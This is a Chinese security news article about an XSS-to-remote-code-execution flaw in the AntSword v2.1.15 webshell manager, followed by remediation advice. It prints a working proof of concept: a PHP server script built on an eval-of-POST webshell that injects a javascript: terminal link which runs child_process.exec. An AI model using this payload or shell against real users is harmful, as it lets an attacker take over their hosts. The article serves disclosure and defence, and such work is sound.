紧急！蚁剑 v2.1.15 曝致命漏洞。网友：玩一辈子鹰，被鹰啄瞎了眼-西风网络安全

2026年4月28日，安全圈曝出重磅预警——AntSword（中国蚁剑）v2.1.15 被发现高危漏洞。

该漏洞早在4月24日，安全研究员 s2cr3t 在 AntSword 官方 GitHub 仓库就提交了一个高危漏洞报告（Issue #370）。

攻击者可构造恶意服务端响应，实现 XSS 注入直接转为远程代码执行（RCE），用户只需轻点一下，本机就会被完全控制。

先看什么是蚁剑？

AntSword（中国蚁剑） 是一款开源跨平台的网站管理与渗透测试工具，基于 Electron 开发，广泛用于Webshell 管理、文件操作、数据库管理、虚拟终端等场景，是安全从业者、渗透测试人员常用的辅助工具，支持 PHP/ASP/ASPX/JSP 等多种脚本环境。

但也正因高权限、高频使用，一旦工具自身出现漏洞，极易被黑产利用，反噬使用者本地主机。

一、漏洞核心信息

– 漏洞来源：GitHub Issues #370
– 影响版本：AntSword v2.1.15
– 漏洞类型：XSS → RCE 任意代码执行
– 利用难度：极低，点击即触发
– 危害等级：高危

二、漏洞原理

漏洞根源在于 antSword.noxss() 过滤不完整，仅对 5 个基础字符做转义，未覆盖 [ ] ! ; : 等 jquery.terminal 格式码字符。
恶意服务端可注入构造好的脚本链接，绕过过滤后在虚拟终端渲染为可点击链接。

由于蚁剑基于 Electron 开发，且开启了 nodeIntegration: true ，一旦点击链接，可直接调用 Node.js API，执行任意系统命令，完全接管用户主机。

三、攻击流程

攻击者部署恶意服务端，注入含 javascript: 协议的 Payload

攻击流程（极简复现）

恶意 PHP 服务端构造 Payload：

[[!;;;;javascript:void(require(`child_process`).exec(`calc.exe`))]{http://localhost/phpmyadmin/}]

蚁剑连接该服务端，打开虚拟终端执行任意命令；

命令输出出现 “正常链接”，用户点击后本地弹出计算器，可进一步执行任意恶意代码。

Exp：

<?php$pass = 'test';if (!isset($_POST[$pass])) {    http_response_code(404);    exit;}$code = $_POST[$pass];if (!function_exists('get_magic_quotes_gpc')) {    function get_magic_quotes_gpc() { return 0; }}$payload = '[[!;;;;javascript:void(require(`child_process`).exec(`calc`))]{Click here for phpMyAdmin}]';$b64payload = base64_encode("n" . $payload);$inject = 'echo base64_decode("' . $b64payload . '");';// 只在终端命令请求时注入 (包含 system/exec/passthru/popen 等命令执行函数)if (preg_match('/bsystemb|bexecb|bpassthrub|bpopenb|bshell_execb|bproc_openb/', $code)) {    $code = str_replace('asoutput();', $inject . 'asoutput();', $code);}@eval($code);?>

四、官方修复方案

1. 首选方案：立即升级到 v2.1.16
2. 临时加固：扩展 noxss() 过滤规则，转义 [ 字符

最小改动（推荐）

扩展noxss()过滤字符集，转义[，阻断格式码解析：

noxss: (html = '', wrap = true) => {  let _html = String(html)    .replace(/&/g, "&amp;")    .replace(/'/g, "&apos;")    .replace(/>/g, "&gt;")    .replace(/</g, "&lt;")    .replace(/"/g, "&quot;")    .replace(/[/g, "&#91;"); // 新增：阻断格式码  if (wrap) {    _html = _html.replace(/n/g, '<br/>');  }  return _html;}

3. 限制协议：仅放行 http/https，禁止 javascript:

4. 根治方案：关闭 nodeIntegration ，使用 contextBridge 安全隔离

五、安全建议

1. 立即停止使用 v2.1.15，升级到最新版 v2.1.16
2. 不连接不明、不可信的服务端
3. 虚拟终端内陌生链接一律不点击
4. 高频使用者按官方方案加固环境，降低权限风险

渗透工具是一把双刃剑，自身安全直接决定使用者风险。请所有蚁剑用户尽快自查更新，避免被反向控制！

作者：hacking。前北漂程序员，现在做安全。

文章数据来自网络，大模型优化，侵权删。

往期相关回顾

突发！意大利批准：美国引渡中国工程师徐泽伟

度假变噩梦！徐泽伟因美国网络入侵指控在意大利被扣，妻子：老人孩子还能等多久？

被指控网络入侵：中国徐泽伟在意大利被扣押的210天、或被引渡美国

徐泽伟引渡美国！意大利上诉被驳回，被美国指控黑客入侵

朝鲜黑客封神！潜伏6个月盗走2.85亿，DeFi史上最精密猎杀案曝光

版权声明 1 本网站名称：西风网络安全
2 本网站网址：https://www.xifengwangan.cn
3 本网站的文章部分内容可能来源于网络，如有侵权，请联系站长 QQ1606798654 进行删除处理。
4 本网站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本网站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本网站资源存储在服务器中，如发现链接失效，请联系我们，我们会第一时间更新。

THE END